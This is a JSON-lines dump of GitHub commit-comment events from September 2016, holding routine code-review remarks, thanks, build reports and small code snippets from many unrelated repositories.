{"id":"4580223410","type":"CommitCommentEvent","actor":{"login":"bjansen"},"repo":{"name":"ceylon/ceylon-ide-common"},"payload":{"comment":{"id":19071315,"position":14,"line":298,"path":"source/com/redhat/ceylon/ide/common/correct/IdeQuickFixManager.ceylon","commit_id":"4d27783580a40e8dc24fd249f96962d52cd5c854","created_at":"2016-09-18T16:42:38Z","updated_at":"2016-09-18T16:42:38Z","body":"I had to reinstall Eclipse, and it was using tabs by default :( This is now fixed."}},"created_at":"2016-09-18T16:42:38Z"}
{"id":"4580223619","type":"CommitCommentEvent","actor":{"login":"Mod1999"},"repo":{"name":"Mod1999/han.github.io"},"payload":{"comment":{"id":19071316,"position":null,"line":null,"path":null,"commit_id":"ba7778d26d10975d9378d1aa4eec48deba5573b1","created_at":"2016-09-18T16:42:47Z","updated_at":"2016-09-18T16:42:47Z","body":"Сайт"}},"created_at":"2016-09-18T16:42:47Z"}
{"id":"4580224131","type":"CommitCommentEvent","actor":{"login":"bjansen"},"repo":{"name":"ceylon/ceylon-ide-common"},"payload":{"comment":{"id":19071317,"position":null,"line":null,"path":null,"commit_id":"4d27783580a40e8dc24fd249f96962d52cd5c854","created_at":"2016-09-18T16:43:08Z","updated_at":"2016-09-18T16:43:08Z","body":"It was already in the Eclipse plugin, I just ported it here for IJ."}},"created_at":"2016-09-18T16:43:08Z"}
{"id":"4580224550","type":"CommitCommentEvent","actor":{"login":"forrestfiller"},"repo":{"name":"forrestfiller/jns"},"payload":{"comment":{"id":19071318,"position":null,"line":null,"path":null,"commit_id":"e600474fd713e30cf140b2c49b44c673629326df","created_at":"2016-09-18T16:43:26Z","updated_at":"2016-09-18T16:43:26Z","body":"@kleinee Thanks for your help! I really appreciate it.  Unfortunately now I'm unable to change directories into the .jupyter folder to make the configuration change...Any recommendations? Trying the command with sudo doesn't help unfortunately.\r\n\r\n![cd-failed](https://cloud.githubusercontent.com/assets/18606441/18617449/5747f3ec-7d9d-11e6-8883-8ca7e65ce013.png)\r\n"}},"created_at":"2016-09-18T16:43:26Z"}
{"id":"4580225234","type":"CommitCommentEvent","actor":{"login":"bluetheme"},"repo":{"name":"bluetheme/bluetheme"},"payload":{"comment":{"id":19071319,"position":null,"line":null,"path":null,"commit_id":"80943b040c3c37eebc7dd6ff6e8260b2f994fa73","created_at":"2016-09-18T16:43:54Z","updated_at":"2016-09-18T16:43:54Z","body":"hello world"}},"created_at":"2016-09-18T16:43:54Z"}
{"id":"4580232239","type":"CommitCommentEvent","actor":{"login":"Dovyski"},"repo":{"name":"Dovyski/cvui"},"payload":{"comment":{"id":19071330,"position":null,"line":null,"path":null,"commit_id":"a0d89bda66a602b079f70b549300eba1ec67f0a2","created_at":"2016-09-18T16:48:43Z","updated_at":"2016-09-18T16:48:43Z","body":"Thank you for all the help! I integrated your suggestions along with some other from [here](http://genbattle.bitbucket.org/blog/2016/01/17/c++-travis-ci/). I hope it works as expected.\r\n\r\nAbout cmake and Windows, I am aware of that, but I have used it only once. I will give it another try :D"}},"created_at":"2016-09-18T16:48:43Z"}
{"id":"4580233493","type":"CommitCommentEvent","actor":{"login":"olesalscheider"},"repo":{"name":"TelepathyQt/telepathy-nonsense"},"payload":{"comment":{"id":19071332,"position":null,"line":null,"path":null,"commit_id":"8b15bbcbc8ce551435a450068584655469341b76","created_at":"2016-09-18T16:49:37Z","updated_at":"2016-09-18T16:49:37Z","body":"@Kaffeine Please review."}},"created_at":"2016-09-18T16:49:37Z"}
{"id":"4580234120","type":"CommitCommentEvent","actor":{"login":"olesalscheider"},"repo":{"name":"TelepathyQt/telepathy-nonsense"},"payload":{"comment":{"id":19071333,"position":null,"line":null,"path":null,"commit_id":"27b90b56ab3cf975a3cd076fed51e5b2e5bf0090","created_at":"2016-09-18T16:50:04Z","updated_at":"2016-09-18T16:50:04Z","body":"@Kaffeine Please review."}},"created_at":"2016-09-18T16:50:04Z"}
{"id":"4580234668","type":"CommitCommentEvent","actor":{"login":"olesalscheider"},"repo":{"name":"TelepathyQt/telepathy-nonsense"},"payload":{"comment":{"id":19071336,"position":null,"line":null,"path":null,"commit_id":"08380f1d17ed31516281fc2a377d7fb3b76c9d82","created_at":"2016-09-18T16:50:25Z","updated_at":"2016-09-18T16:50:25Z","body":"@Kaffeine Please review."}},"created_at":"2016-09-18T16:50:25Z"}
{"id":"4580235036","type":"CommitCommentEvent","actor":{"login":"thewonderidiot"},"repo":{"name":"rburkey2005/virtualagc"},"payload":{"comment":{"id":19071337,"position":null,"line":null,"path":null,"commit_id":"a644de6322271fd23da23a343b136f3e52c638fc","created_at":"2016-09-18T16:50:42Z","updated_at":"2016-09-18T16:50:42Z","body":"Oh jeez, I haven't. I didn't realize CA was a Block II addition. That must have been a godsend when it was added!"}},"created_at":"2016-09-18T16:50:42Z"}
{"id":"4580236763","type":"CommitCommentEvent","actor":{"login":"asurinov"},"repo":{"name":"asurinov/music.pekadev"},"payload":{"comment":{"id":19071340,"position":null,"line":null,"path":null,"commit_id":"9513249c9f162a08dab0f102803c68cae9066044","created_at":"2016-09-18T16:51:35Z","updated_at":"2016-09-18T16:51:35Z","body":"Closes #2 "}},"created_at":"2016-09-18T16:51:35Z"}
{"id":"4580239045","type":"CommitCommentEvent","actor":{"login":"Decadentvista"},"repo":{"name":"Decadentvista/compuational_physics_N2014301020082"},"payload":{"comment":{"id":19071341,"position":null,"line":null,"path":null,"commit_id":"5a3dad3870651eec378ee421f3b79c28cd1fd8a6","created_at":"2016-09-18T16:53:10Z","updated_at":"2016-09-18T16:53:10Z","body":"![qq 20160918233622](https://cloud.githubusercontent.com/assets/22126911/18617495/4cb7bc9e-7e03-11e6-940b-fc96af7f62f1.png)\r\n![qq 20160918233753](https://cloud.githubusercontent.com/assets/22126911/18617498/5909b5e2-7e03-11e6-97f0-90ec3be86488.png)\r\n"}},"created_at":"2016-09-18T16:53:10Z"}
{"id":"4580239844","type":"CommitCommentEvent","actor":{"login":"noloader"},"repo":{"name":"weidai11/cryptopp"},"payload":{"comment":{"id":19071343,"position":null,"line":null,"path":null,"commit_id":"f57c4dced5bfbcd10d0883ae7161833a70eff268","created_at":"2016-09-18T16:53:44Z","updated_at":"2016-09-18T16:53:44Z","body":"Also see [Move config.h to config.compat; move config.recommend to config.h](http://groups.google.com/forum/#!topic/cryptopp-users/bWcRw1XgJ_Q)"}},"created_at":"2016-09-18T16:53:44Z"}
{"id":"4580241104","type":"CommitCommentEvent","actor":{"login":"bashar1"},"repo":{"name":"msftguy/ssh-rd"},"payload":{"comment":{"id":19071345,"position":null,"line":null,"path":null,"commit_id":"a5f3a79daeac5844edebf01916c9613563f1c390","created_at":"2016-09-18T16:54:33Z","updated_at":"2016-09-18T16:54:33Z","body":"[dmca.pdf](https://github.com/msftguy/ssh-rd/files/478833/dmca.pdf)\r\n"}},"created_at":"2016-09-18T16:54:33Z"}
{"id":"4580241433","type":"CommitCommentEvent","actor":{"login":"bashar1"},"repo":{"name":"msftguy/ssh-rd"},"payload":{"comment":{"id":19071346,"position":null,"line":null,"path":null,"commit_id":"a5f3a79daeac5844edebf01916c9613563f1c390","created_at":"2016-09-18T16:54:48Z","updated_at":"2016-09-18T16:54:48Z","body":"ssh.jar"}},"created_at":"2016-09-18T16:54:48Z"}
{"id":"4580242230","type":"CommitCommentEvent","actor":{"login":"eugkimStar"},"repo":{"name":"lollar/21_card_trick"},"payload":{"comment":{"id":19071348,"position":50,"line":50,"path":"Dealer.java","commit_id":"8379ad6db6ba9235c08d49a62041b4434c1eabc7","created_at":"2016-09-18T16:55:21Z","updated_at":"2016-09-18T16:55:21Z","body":"Thanks Mike, let me see how to incorporate that in, and I'll update my file\nafterwards.\n\nOn Sun, Sep 18, 2016 at 1:19 AM, Mike Lollar <notifications@github.com>\nwrote:\n\n> obviously columnArray doesn't have a dealtCards method but I think this\n> gets the point across well enough.\n>\n> —\n> You are receiving this because you authored the thread.\n> Reply to this email directly, view it on GitHub\n> <https://github.com/lollar/21_card_trick/commit/8379ad6db6ba9235c08d49a62041b4434c1eabc7#commitcomment-19069701>,\n> or mute the thread\n> <https://github.com/notifications/unsubscribe-auth/AVK_sx1z6j0KAPYda-F1VgFFeT4j2hxaks5qrOXxgaJpZM4J_oCA>\n> .\n>\n"}},"created_at":"2016-09-18T16:55:21Z"}
{"id":"4580242916","type":"CommitCommentEvent","actor":{"login":"jameysharp"},"repo":{"name":"jameysharp/corrode"},"payload":{"comment":{"id":19071349,"position":null,"line":null,"path":null,"commit_id":"7c4e803cf5295dff46221da48e8e607cb656891e","created_at":"2016-09-18T16:55:49Z","updated_at":"2016-09-18T16:55:49Z","body":"No problem! I want the code to be clear, and that requires having these kinds of discussions. :smile:"}},"created_at":"2016-09-18T16:55:49Z"}
{"id":"4580244036","type":"CommitCommentEvent","actor":{"login":"psycofdj"},"repo":{"name":"psycofdj/xtdcpp"},"payload":{"comment":{"id":19071351,"position":null,"line":null,"path":null,"commit_id":"9ba47d69d8c02377bc52e540ac453330d55dd346","created_at":"2016-09-18T16:56:33Z","updated_at":"2016-09-18T16:56:33Z","body":"Build report #160854933 for sha 9ba47d69d8c02377bc52e540ac453330d55dd346:\n\n[![UnitTests](https://img.shields.io/badge/unittests-passed%20%283/3%29%20-brightgreen.svg)](#)\n[![Coverage](https://img.shields.io/badge/coverage-14.08%20%25-yellow.svg)](#)\n[![Cppcheck](https://img.shields.io/badge/cppcheck-0%20error%28s%29-brightgreen.svg)](#)\n[![Code statistics](https://img.shields.io/badge/cloc-2186%20/%209923%20%2822.03%20%25%29-yellow.svg)](#)\n[![Documentation](https://img.shields.io/badge/doc-success-brightgreen.svg)](#)\n[![Documentation coverage](https://img.shields.io/badge/doc--coverage-17.44%20%25-yellow.svg)](#)\n"}},"created_at":"2016-09-18T16:56:33Z"}
{"id":"4580246659","type":"CommitCommentEvent","actor":{"login":"YaroslavW"},"repo":{"name":"YaroslavW/JavaScript"},"payload":{"comment":{"id":19071355,"position":17,"line":17,"path":"Степень числа","commit_id":"7cbc8d5d2dcdd6ff7986f05c275155c501fe175b","created_at":"2016-09-18T16:58:18Z","updated_at":"2016-09-18T16:58:18Z","body":"function pow(x, n) {\r\n  var result = 1;\r\nfor (var i = 0; i < n; i++) {\r\n  result *= x;\r\n}\r\nreturn result;\r\n}\r\n\r\nvar x = prompt(\"x\" , \"\");\r\nvar n = prompt(\"n\" , \"\");\r\n\r\nif (n < 0) {\r\n  alert('Степень ' + n + 'не поддерживается');\r\n}else{\r\n  alert( pow(x, n) );\r\n} "}},"created_at":"2016-09-18T16:58:18Z"}
{"id":"4580248033","type":"CommitCommentEvent","actor":{"login":"LucDemortier"},"repo":{"name":"mitchki/dsp"},"payload":{"comment":{"id":19071356,"position":null,"line":null,"path":null,"commit_id":"d35a3b9ed8c1005c69f68805ad798cc3875d48ed","created_at":"2016-09-18T16:58:53Z","updated_at":"2016-09-18T16:58:53Z","body":"RE: 05a-python.md\r\ncc: @lucdemortier @reshamametis @aramnath @gfsoileau @julialintern @galvin-mj\r\n\r\nHello @mitchki \r\n\r\nNice work with Python! Here are some comments:\r\n- Q1: Lists and tuples do not need to be homogeneous. They can contain integers, strings, floats, etc., or a mixture of those. Tuples, but not lists, can be used as dictionary keys. This is because tuples are immutable. Dictionary keys are associated with values through hashing. If keys were mutable, the hashing would no longer work as expected.\r\n\r\n👍\r\n"}},"created_at":"2016-09-18T16:58:53Z"}
{"id":"4580249761","type":"CommitCommentEvent","actor":{"login":"cb1kenobi"},"repo":{"name":"hansemannn/titanium_mobile"},"payload":{"comment":{"id":19071359,"position":31,"line":1886,"path":"iphone/cli/commands/_build.js","commit_id":"ed273953fec2fdfa36bfbe9431d0c9600d50a3a6","created_at":"2016-09-18T17:00:00Z","updated_at":"2016-09-18T17:00:00Z","body":"You don't need to pass any of the info in since `this.getProvisioningProfile()` can just get it from `this`."}},"created_at":"2016-09-18T17:00:00Z"}
{"id":"4580252688","type":"CommitCommentEvent","actor":{"login":"vlad-i"},"repo":{"name":"adrcotfas/Goodtime"},"payload":{"comment":{"id":19071360,"position":null,"line":null,"path":null,"commit_id":"e9cda8ce31273eb1dae60ac368217a1ba1a6e4b2","created_at":"2016-09-18T17:01:41Z","updated_at":"2016-09-18T17:01:41Z","body":"is there a minSDKversion anywhere?"}},"created_at":"2016-09-18T17:01:41Z"}
{"id":"4580253335","type":"CommitCommentEvent","actor":{"login":"fetzerch"},"repo":{"name":"wsnipex/xbmc"},"payload":{"comment":{"id":19071361,"position":32,"line":640,"path":"project/cmake/scripts/common/Macros.cmake","commit_id":"e4d36ab2518646c46599a244a32dd1fabb97dbb1","created_at":"2016-09-18T17:02:09Z","updated_at":"2016-09-18T17:02:09Z","body":"Thanks for trying that :), I'm also not a big fan of building during configure, one small issue in a cmake file might retrigger the whole ffmpeg build. I'm wondering if the package config files are already written at configure time, then we could just configure it and trigger the build separately. I've read a blog post about doing something similar a while ago: https://crascit.com/2015/07/25/cmake-gtest/\r\n\r\nNonetheless, guess that's nothing for the current PR."}},"created_at":"2016-09-18T17:02:09Z"}
{"id":"4580255227","type":"CommitCommentEvent","actor":{"login":"boxa"},"repo":{"name":"ACID-Scripts/WOTLK"},"payload":{"comment":{"id":19071362,"position":19,"line":18586,"path":"acid_wotlk.sql","commit_id":"057287c88464f47f0e0eacb5902ac0b0ded108d0","created_at":"2016-09-18T17:02:47Z","updated_at":"2016-09-18T17:02:47Z","body":"('2183703','21837','9','0','100','1','0','5','6000','10000','11','36406',___'0___','0','0','0','0','0','0','0','0','0','Summoned Wrath Hound - Cast Double Breath')\r\n\r\nself cast"}},"created_at":"2016-09-18T17:02:47Z"}
{"id":"4580255973","type":"CommitCommentEvent","actor":{"login":"boxa"},"repo":{"name":"ACID-Scripts/WOTLK"},"payload":{"comment":{"id":19071363,"position":31,"line":18639,"path":"acid_wotlk.sql","commit_id":"057287c88464f47f0e0eacb5902ac0b0ded108d0","created_at":"2016-09-18T17:03:16Z","updated_at":"2016-09-18T17:03:16Z","body":"('2249901','22499','9','0','100','1','0','5','6000','10000','11','36406',___'0'___,'0','0','0','0','0','0','0','0','0','Lesser Wrath Hound - Cast Double Breath')\r\n\r\nself cast"}},"created_at":"2016-09-18T17:03:16Z"}
{"id":"4580257034","type":"CommitCommentEvent","actor":{"login":"cb1kenobi"},"repo":{"name":"hansemannn/titanium_mobile"},"payload":{"comment":{"id":19071364,"position":41,"line":1896,"path":"iphone/cli/commands/_build.js","commit_id":"ed273953fec2fdfa36bfbe9431d0c9600d50a3a6","created_at":"2016-09-18T17:03:57Z","updated_at":"2016-09-18T17:03:57Z","body":"This is ok for now, but it's not future proof. When Alloy becomes apart of the Titanium build, we'll have a property that indicates if the app is Alloy.\r\n\r\nSecond, use `.some()` instead of `.forEach()`. That way you can return true the second you detect the Alloy plugin."}},"created_at":"2016-09-18T17:03:57Z"}
{"id":"4580257763","type":"CommitCommentEvent","actor":{"login":"cb1kenobi"},"repo":{"name":"hansemannn/titanium_mobile"},"payload":{"comment":{"id":19071365,"position":42,"line":1897,"path":"iphone/cli/commands/_build.js","commit_id":"ed273953fec2fdfa36bfbe9431d0c9600d50a3a6","created_at":"2016-09-18T17:04:27Z","updated_at":"2016-09-18T17:04:27Z","body":"Please use strict equality `===` and single quotes."}},"created_at":"2016-09-18T17:04:27Z"}
{"id":"4580258036","type":"CommitCommentEvent","actor":{"login":"Kaffeine"},"repo":{"name":"TelepathyQt/telepathy-nonsense"},"payload":{"comment":{"id":19071366,"position":null,"line":null,"path":null,"commit_id":"27b90b56ab3cf975a3cd076fed51e5b2e5bf0090","created_at":"2016-09-18T17:04:37Z","updated_at":"2016-09-18T17:04:37Z","body":"Looking good to me."}},"created_at":"2016-09-18T17:04:37Z"}
{"id":"4580258154","type":"CommitCommentEvent","actor":{"login":"kthtes"},"repo":{"name":"wang-bin/QtAV"},"payload":{"comment":{"id":19071367,"position":null,"line":null,"path":null,"commit_id":"cf78e27f68fe032622a9778871199cb53d78ed35","created_at":"2016-09-18T17:04:41Z","updated_at":"2016-09-18T17:04:41Z","body":"Great. Thanks!"}},"created_at":"2016-09-18T17:04:41Z"}
{"id":"4580259053","type":"CommitCommentEvent","actor":{"login":"cb1kenobi"},"repo":{"name":"hansemannn/titanium_mobile"},"payload":{"comment":{"id":19071369,"position":56,"line":1911,"path":"iphone/cli/commands/_build.js","commit_id":"ed273953fec2fdfa36bfbe9431d0c9600d50a3a6","created_at":"2016-09-18T17:05:17Z","updated_at":"2016-09-18T17:05:17Z","body":"Indentation should be at the beginning, not the end."}},"created_at":"2016-09-18T17:05:17Z"}
{"id":"4580261313","type":"CommitCommentEvent","actor":{"login":"wsnipex"},"repo":{"name":"wsnipex/xbmc"},"payload":{"comment":{"id":19071370,"position":32,"line":640,"path":"project/cmake/scripts/common/Macros.cmake","commit_id":"e4d36ab2518646c46599a244a32dd1fabb97dbb1","created_at":"2016-09-18T17:06:50Z","updated_at":"2016-09-18T17:06:50Z","body":"nope, pc files are only available after build"}},"created_at":"2016-09-18T17:06:50Z"}
{"id":"4580261899","type":"CommitCommentEvent","actor":{"login":"alex011235"},"repo":{"name":"alex011235/FaceSwap"},"payload":{"comment":{"id":19071372,"position":null,"line":null,"path":null,"commit_id":"bbd2d6e05015f4f15a27461770e5778f3c4abf07","created_at":"2016-09-18T17:07:14Z","updated_at":"2016-09-18T17:07:14Z","body":"I know what the problem is. This project doesn't support some processor architectures. I have been trying to compile source files for all architectures for some time but the problem is still there."}},"created_at":"2016-09-18T17:07:14Z"}
{"id":"4580266257","type":"CommitCommentEvent","actor":{"login":"shawnwahi"},"repo":{"name":"NamelessRom/android_packages_apps_Screencast"},"payload":{"comment":{"id":19071375,"position":null,"line":null,"path":null,"commit_id":"29190edbb6dc7f1dff67da0b4cbd8b3582adc036","created_at":"2016-09-18T17:10:00Z","updated_at":"2016-09-18T17:10:00Z","body":"Did u ever get a chance to fix it"}},"created_at":"2016-09-18T17:10:00Z"}
{"id":"4580267295","type":"CommitCommentEvent","actor":{"login":"remotevase"},"repo":{"name":"Inactive-to-Reactive/ImagicalMine"},"payload":{"comment":{"id":19071376,"position":null,"line":null,"path":null,"commit_id":"7d2e9fdcd1e92db4e8295db22f5a7b70ef1944cf","created_at":"2016-09-18T17:10:38Z","updated_at":"2016-09-18T17:10:38Z","body":"XD"}},"created_at":"2016-09-18T17:10:38Z"}
{"id":"4580267742","type":"CommitCommentEvent","actor":{"login":"ShinraTensei"},"repo":{"name":"ShinraTensei/Sokoban"},"payload":{"comment":{"id":19071377,"position":28,"line":28,"path":"src/game.c","commit_id":"9f4e8921b58544da36a02ab4d53d552f0b267510","created_at":"2016-09-18T17:10:56Z","updated_at":"2016-09-18T17:10:56Z","body":"yes"}},"created_at":"2016-09-18T17:10:56Z"}
{"id":"4580268674","type":"CommitCommentEvent","actor":{"login":"remotevase"},"repo":{"name":"Inactive-to-Reactive/ImagicalMine"},"payload":{"comment":{"id":19071379,"position":null,"line":null,"path":null,"commit_id":"0d9f89f69732dcdff0b8448de36266fa77bd5976","created_at":"2016-09-18T17:11:35Z","updated_at":"2016-09-18T17:11:35Z","body":"Umm... Uhhh... WASN'T ME"}},"created_at":"2016-09-18T17:11:35Z"}
{"id":"4580271038","type":"CommitCommentEvent","actor":{"login":"salam1982"},"repo":{"name":"salam1982/BREANKING-NEWS"},"payload":{"comment":{"id":19071380,"position":null,"line":null,"path":null,"commit_id":"64ecbe34904126fee3f700e7d0670ea4ae9f1f53","created_at":"2016-09-18T17:13:06Z","updated_at":"2016-09-18T17:13:06Z","body":"<style>\r\n#cnmunewasbar {\r\n  background: #fff;\r\n  box-shadow: 0 0 1px #777;\r\n  height: 30px;\r\n  width: 100%;\r\n}\r\n.cnmunbtile {\r\n  background:#008EFA;\r\n  color: #fff;\r\n  display: inline-block;\r\n  float: right;\r\n  font: bold 14px/30px tahoma;\r\n  height: 100%;\r\n  margin-left: -112px;\r\n  text-align: center;\r\n  width: 110px;\r\n}\r\n.cnmu-newsb-srp {\r\n  float: right;\r\n  font: 14px/28px tahoma !important;\r\n  margin-right: 112px;\r\n}\r\n</style>\r\n<script type=\"text/javascript\">\r\n    var cnmuWidth= 100;\r\n    var cnmuScrollAmount=0;\r\n    var cnmuScrollDelay=80;\r\n    var cnmuDirection=\"right\";\r\n    var cnmutargetlink=\"yes\";\r\n    var cnmunumPosts=10;\r\n    var cnmuBulletchar =\">>>\";\r\n    var cnmuimagebullet=\"yes\";\r\n    var cnmuimgurl=\"https://lh6.googleusercontent.com/-YHYwSfOe3XY/VEIv0ZeiOZI/AAAAAAAAE40/3ZHADkTW5Io/s35/jaded.gif\";\r\n    var cnmufontsize=16;\r\n    var cnmubgcolor=\"transparent\";\r\n    var cnmulinkcolor=\"008EFA\";\r\n    var cnmulinkhovercolor=\"CD0317\";\r\n</script>\r\n<div id=\"cnmunewasbar\">\r\n<span class=\"cnmunbtile\">آخر الأخبار</span>\r\n<script src='https://cnmu.googlecode.com/svn/trunk/2014/newsbar.js' type='text/javascript'></script>\r\n<script type=\"text/javascript\" src=\"http://cnmu.blogspot.com/feeds/posts/default?alt=json-in-script&callback=cnmuAdvRecentPostsScrollerv3&max-results=50\" ></script>\r\n<div style='clear: both;'></div>\r\n</div>"}},"created_at":"2016-09-18T17:13:06Z"}
{"id":"4580272681","type":"CommitCommentEvent","actor":{"login":"Linjieqiang"},"repo":{"name":"betaflight/betaflight-configurator"},"payload":{"comment":{"id":19071383,"position":null,"line":null,"path":null,"commit_id":"f3bfb085f8dd798a41f4de05679f720511781cfc","created_at":"2016-09-18T17:14:14Z","updated_at":"2016-09-18T17:14:14Z","body":"OK thanks"}},"created_at":"2016-09-18T17:14:14Z"}
{"id":"4580273080","type":"CommitCommentEvent","actor":{"login":"Sandertv"},"repo":{"name":"Inactive-to-Reactive/ImagicalMine"},"payload":{"comment":{"id":19071385,"position":null,"line":null,"path":null,"commit_id":"0d9f89f69732dcdff0b8448de36266fa77bd5976","created_at":"2016-09-18T17:14:29Z","updated_at":"2016-09-18T17:14:29Z","body":"You added it in your small fix commit @DarkWav :P"}},"created_at":"2016-09-18T17:14:29Z"}
{"id":"4580274154","type":"CommitCommentEvent","actor":{"login":"Kaffeine"},"repo":{"name":"TelepathyQt/telepathy-qt"},"payload":{"comment":{"id":19071390,"position":null,"line":null,"path":null,"commit_id":"787cb81986e2356686be92d0acea90e11ccfeec7","created_at":"2016-09-18T17:15:16Z","updated_at":"2016-09-18T17:15:16Z","body":"@gkiagia Nice job.\r\n\"Reviewed-by\" me for the series."}},"created_at":"2016-09-18T17:15:16Z"}
{"id":"4580274439","type":"CommitCommentEvent","actor":{"login":"andburn"},"repo":{"name":"HearthSim/joust"},"payload":{"comment":{"id":19071391,"position":null,"line":null,"path":null,"commit_id":"646c1cfa448ee3973169f46586e72d73ece0a314","created_at":"2016-09-18T17:15:28Z","updated_at":"2016-09-18T17:15:28Z","body":"OMG I didn't realize you could go over 100% 😲 \r\nThis explains a lot 😆 thanks."}},"created_at":"2016-09-18T17:15:28Z"}
{"id":"4580275193","type":"CommitCommentEvent","actor":{"login":"guanfrank"},"repo":{"name":"Shoooske/ExData_Plotting1"},"payload":{"comment":{"id":19071392,"position":null,"line":null,"path":null,"commit_id":"48bd3de97638b7d0b5297ac8f232af558af15622","created_at":"2016-09-18T17:15:59Z","updated_at":"2016-09-18T17:15:59Z","body":"1. Your 'grep' command get rid off the header. Should set header = False, when you call read.table.\r\n2. Set bg=\"transparent\" if you want the transparency in the background."}},"created_at":"2016-09-18T17:15:59Z"}
{"id":"4580275866","type":"CommitCommentEvent","actor":{"login":"hexagoncode"},"repo":{"name":"lashtear/tinymux"},"payload":{"comment":{"id":19071393,"position":null,"line":null,"path":null,"commit_id":"9616b85f7eb1bd859d0e4c4ef15d3d8294d88386","created_at":"2016-09-18T17:16:26Z","updated_at":"2016-09-18T17:16:26Z","body":"Getting install errors when running make after this addition\r\n--snip--\r\n```\r\n  CXX      bsd.o\r\nbsd.cpp: In function ‘void SetHimState(DESC*, unsigned char, int)’:\r\nbsd.cpp:2942:45: error: ‘tls_ctx’ was not declared in this scope\r\n  else if ((TELNET_STARTTLS == chOption) && (tls_ctx != NULL))\r\n                                             ^\r\nMakefile:1513: recipe for target 'bsd.o' failed\r\nmake[1]: *** [bsd.o] Error 1\r\nmake[1]: Leaving directory '/home/hexagon/tinymux/mux'\r\nMakefile:975: recipe for target 'all' failed\r\nmake: *** [all] Error 2\r\n```\r\n"}},"created_at":"2016-09-18T17:16:26Z"}
{"id":"4580281322","type":"CommitCommentEvent","actor":{"login":"knmurthy"},"repo":{"name":"nitrogen-os-devices/android_device_lge_hammerhead"},"payload":{"comment":{"id":19071399,"position":null,"line":null,"path":null,"commit_id":"9d881759804e7fb757af69ce7454f991233a8f0d","created_at":"2016-09-18T17:20:17Z","updated_at":"2016-09-18T17:20:17Z","body":"Hi Mex, may I know why you have reverted this commit.  Do you have any other solution?"}},"created_at":"2016-09-18T17:20:17Z"}
{"id":"4580283742","type":"CommitCommentEvent","actor":{"login":"stevengj"},"repo":{"name":"ApproxFun/ApproxFun.jl"},"payload":{"comment":{"id":19071401,"position":6,"line":440,"path":"src/Fun/Fun.jl","commit_id":"b40ebffb429af86394b1e034f61481ed3654e8bf","created_at":"2016-09-18T17:21:55Z","updated_at":"2016-09-18T17:21:55Z","body":"This definition doesn't seem right: you aren't even using `op`.   Maybe you meant `op(f(x))`?"}},"created_at":"2016-09-18T17:21:55Z"}
{"id":"4580283893","type":"CommitCommentEvent","actor":{"login":"dashesy"},"repo":{"name":"dashesy/amiigo-link"},"payload":{"comment":{"id":19071402,"position":null,"line":null,"path":null,"commit_id":"9c2cf5a2796018ee408e00c14fd16fb4e46ba31f","created_at":"2016-09-18T17:22:02Z","updated_at":"2016-09-18T17:22:02Z","body":"ls_duration is the duration of light capture session, ls_interval is the interval between light capture sessions. both are in seconds, accel_rate is interval between 2 samples. `--help` should mention the units correctly"}},"created_at":"2016-09-18T17:22:02Z"}
{"id":"4580284399","type":"CommitCommentEvent","actor":{"login":"FWsantos"},"repo":{"name":"FWsantos/trabalho-de-matematica"},"payload":{"comment":{"id":19071403,"position":null,"line":null,"path":null,"commit_id":"b095892abc1fb73baaea2ae0bde08a7dd0b0e14d","created_at":"2016-09-18T17:22:22Z","updated_at":"2016-09-18T17:22:22Z","body":"adicionando o primeiro index"}},"created_at":"2016-09-18T17:22:22Z"}
{"id":"4580286363","type":"CommitCommentEvent","actor":{"login":"barryross"},"repo":{"name":"carenbraj/relaxr"},"payload":{"comment":{"id":19071404,"position":10,"line":10,"path":"relxr_landing/index.html","commit_id":"2b580ce798bea0d0b8c2b1ac0472e2d2fa9f3a91","created_at":"2016-09-18T17:23:40Z","updated_at":"2016-09-18T17:23:40Z","body":"Nice work brining in the Google Font.  Looks like you hit many of the design specs laid out in the file.  There were a handful which you didn't hit, so I left a mark off.  I notice you used a mix of numbers and words, such as \"600\" and \"lighter\" for the fonts.  With Google Fonts, it's best to stick with the numbers. "}},"created_at":"2016-09-18T17:23:40Z"}
{"id":"4580288187","type":"CommitCommentEvent","actor":{"login":"barryross"},"repo":{"name":"carenbraj/relaxr"},"payload":{"comment":{"id":19071406,"position":15,"line":15,"path":"relxr_landing/index.html","commit_id":"2b580ce798bea0d0b8c2b1ac0472e2d2fa9f3a91","created_at":"2016-09-18T17:24:54Z","updated_at":"2016-09-18T17:24:54Z","body":"looks like you are missing some semicolons, like on lines 14 and 19...that can lead to unexpected behavior, so it's important we remember to include them.  "}},"created_at":"2016-09-18T17:24:54Z"}
{"id":"4580289561","type":"CommitCommentEvent","actor":{"login":"Beloya"},"repo":{"name":"hzwjm/iNot-eclient"},"payload":{"comment":{"id":19071407,"position":null,"line":null,"path":null,"commit_id":"ab6a688ddb548b1e976f5edbd2482acb44ea0047","created_at":"2016-09-18T17:25:52Z","updated_at":"2016-09-18T17:25:52Z","body":"请问这是天翼2.2更新的算法吗？"}},"created_at":"2016-09-18T17:25:52Z"}
{"id":"4580289567","type":"CommitCommentEvent","actor":{"login":"barryross"},"repo":{"name":"carenbraj/relaxr"},"payload":{"comment":{"id":19071408,"position":155,"line":155,"path":"relxr_landing/index.html","commit_id":"2b580ce798bea0d0b8c2b1ac0472e2d2fa9f3a91","created_at":"2016-09-18T17:25:52Z","updated_at":"2016-09-18T17:25:52Z","body":"Nice work figuring out a solution for this.  You may want to have a look at the solution code to see how you could go about getting the rounded corners for the button etc.  Nice work though!"}},"created_at":"2016-09-18T17:25:52Z"}
{"id":"4580289773","type":"CommitCommentEvent","actor":{"login":"barryross"},"repo":{"name":"carenbraj/relaxr"},"payload":{"comment":{"id":19071409,"position":195,"line":195,"path":"relxr_landing/index.html","commit_id":"2b580ce798bea0d0b8c2b1ac0472e2d2fa9f3a91","created_at":"2016-09-18T17:26:02Z","updated_at":"2016-09-18T17:26:02Z","body":"Great choice of HTML5 elements throughout"}},"created_at":"2016-09-18T17:26:02Z"}
{"id":"4580290213","type":"CommitCommentEvent","actor":{"login":"jakirkham"},"repo":{"name":"conda-forge/metis-feedstock"},"payload":{"comment":{"id":19071411,"position":null,"line":null,"path":null,"commit_id":"5298f1adf97bea72d2e04acec7f9d884665811f7","created_at":"2016-09-18T17:26:21Z","updated_at":"2016-09-18T17:26:21Z","body":"Please fork and make changes on your fork which are sent back as PRs, @basnijholt."}},"created_at":"2016-09-18T17:26:21Z"}
